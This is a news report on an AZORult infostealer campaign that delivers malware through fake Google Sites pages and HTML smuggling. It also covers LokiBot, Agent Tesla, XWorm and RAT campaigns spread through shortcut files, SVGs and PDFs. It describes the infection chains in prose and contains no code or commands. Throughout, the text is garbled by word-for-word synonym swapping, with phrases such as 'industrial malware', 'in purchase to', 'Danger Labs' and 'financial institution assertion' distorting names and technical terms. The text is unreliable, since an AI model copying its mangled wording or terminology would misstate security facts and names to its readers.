Cybersecurity researchers have discovered a new malware marketing campaign that leverages bogus Google Web pages web pages and HTML smuggling to distribute a industrial malware termed AZORult in purchase to aid info theft.
“It uses an unorthodox HTML smuggling approach where the destructive payload is embedded in a individual JSON file hosted on an external web site,” Netskope Danger Labs researcher Jan Michael Alcantara stated in a report posted last week.
The phishing marketing campaign has not been attributed to a particular risk actor or team. The cybersecurity organization explained it as popular in character, carried out with an intent to gather delicate facts for offering them in underground boards.
AZORult, also called PuffStealer and Ruzalto, is an data stealer first detected all-around 2016. It really is generally distributed through phishing and malspam campaigns, trojanized installers for pirated software program or media, and malvertising.
The moment set up, it’s capable of accumulating qualifications, cookies, and history from web browsers, screenshots, paperwork matching a listing of unique extensions (.TXT, .DOC, .XLS, .DOCX, .XLSX, .AXX, and .KDBX), and data from 137 cryptocurrency wallets. AXX files are encrypted information developed by AxCrypt, while KDBX refers to a password databases designed by the KeePass password manager.
The most recent attack action requires the threat actor building counterfeit Google Docs webpages on Google Web pages that subsequently employ HTML smuggling to provide the payload.
HTML smuggling is the title offered to a stealthy procedure in which legit HTML5 and JavaScript attributes are abused to assemble and launch the malware by “smuggling” an encoded malicious script.
Consequently, when a visitor is tricked into opening the rogue web page from a phishing email, the browser decodes the script and extracts the payload on the host product, correctly bypassing standard security controls this kind of as email gateways that are recognised to only inspect for suspicious attachments.
The AZORult campaign usually takes this strategy a notch higher by including a CAPTCHA barrier, an technique that not only gives a veneer of legitimacy but also serves as an extra layer of protection versus URL scanners.
The downloaded file is a shortcut file (.LNK) that masquerades as a PDF financial institution assertion, launching which kicks off a series of steps to execute a series of intermediate batch and PowerShell scripts from an already compromised domain.
One particular of the PowerShell scripts (“agent3.ps1”) is developed to fetch the AZORult loader (“services.exe”), which, in flip, downloads and executes a further PowerShell script (“sd2.ps1”) that contains the stealer malware.
“It executes the fileless AZORult infostealer stealthily by utilizing reflective code loading, bypassing disk-centered detection and reducing artifacts,” Michael Alcantara explained. “It makes use of an AMSI bypass procedure to evade being detected by a range of host-primarily based anti-malware products, like Windows Defender.”
“Not like prevalent smuggling files the place the blob is now within the HTML code, this marketing campaign copies an encoded payload from a independent compromised website. Working with authentic domains like Google Web pages can enable trick the sufferer into believing the backlink is authentic.”
The findings occur as Cofense disclosed the use of malicious SVG documents by risk actors in modern strategies to disseminate Agent Tesla and XWorm making use of an open-source software called AutoSmuggle that simplifies the procedure of crafting HTML or SVG smuggled data files.
AutoSmuggle “normally takes a file this sort of as an exe or an archive and ‘smuggles’ it into the SVG or HTML file so that when the SVG or HTML file is opened, the ‘smuggled’ file is delivered,” the enterprise stated.
Phishing strategies have also been observed using shortcut documents packed inside archive information to propagate LokiBot, an data stealer analogous to AZORult with features to harvest info from web browsers and cryptocurrency wallets.
“The LNK file executes a PowerShell script to download and execute the LokiBot loader executable from a URL. LokiBot malware has been noticed applying picture steganography, multi-layered packing and dwelling-off-the-land (LotL) methods in past strategies,” SonicWall disclosed very last 7 days.
In an additional instance highlighted by Docguard, destructive shortcut documents have been located to initiate a collection of payload downloads and ultimately deploy AutoIt-based malware.
That’s not all. Users in the Latin American area are remaining focused as part of an ongoing marketing campaign in which the attackers impersonate Colombian authorities agencies to mail booby-trapped e-mail with PDF paperwork that accuse the recipients of flouting site visitors policies.
Existing within the PDF file is a connection that, on click, outcomes in the down load of a ZIP archive containing a VBScript. When executed, the VBScript drops a PowerShell script dependable for fetching 1 of the remote accessibility trojans like AsyncRAT, njRAT, and Remcos.
Located this write-up appealing? Follow us on Twitter and LinkedIn to examine far more special content we write-up.
Some parts of this article are sourced from:
thehackernews.com